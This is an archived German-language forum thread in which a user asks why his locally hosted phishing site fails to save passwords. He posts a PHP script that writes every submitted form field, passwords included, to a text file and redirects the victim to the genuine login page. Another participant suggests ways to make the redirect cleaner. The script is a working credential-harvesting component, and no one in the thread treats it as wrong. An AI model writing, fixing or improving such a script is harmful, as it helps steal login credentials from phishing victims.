PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Phishing von lokalem Rechner aus



Draik
17.03.2009, 20:12
hallo,
ich hab versucht eine phishing-site einzurichten, die bei mir von einem apache webserver aus läuft. leider wird nicht das passwort gespeichert, sondern einfach nur die file, die das passwort abspeichern soll, in einer neuen seite geöffnet, da steht dann einfach nur der inhalt:

<?php
header ('Location: http://www.site.com/login.php ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
/edit das problem besteht auch weiterhin, wenn die save.php auf einem (lokalen) ftp server liegt. (liegt das evtl an den schreibrechten?)

ich hab sicher irgend nen noobigen fehler gemacht, bitte helft mir ;D

cl9wn
17.03.2009, 22:17
kA aber das gehört ins PHP-Forum hier ...

Draik
18.03.2009, 18:01
kann geschlossen werden, hab das problem mittlerweile gefunden, ich hab vergessen php zu installieren ;D

TamCore
18.03.2009, 18:43
Nochn Tip:
Entfern des
header ('Location: http://www.site.com/login.php '); aus der ersten Zeile und ersetz des
exit; in der letzten Zeile durch nen
header('Location: http://www.site.com/login.php', true, 301);
Und schau dir mal file_put_contents(); (http://de.php.net/file_put_contents) an.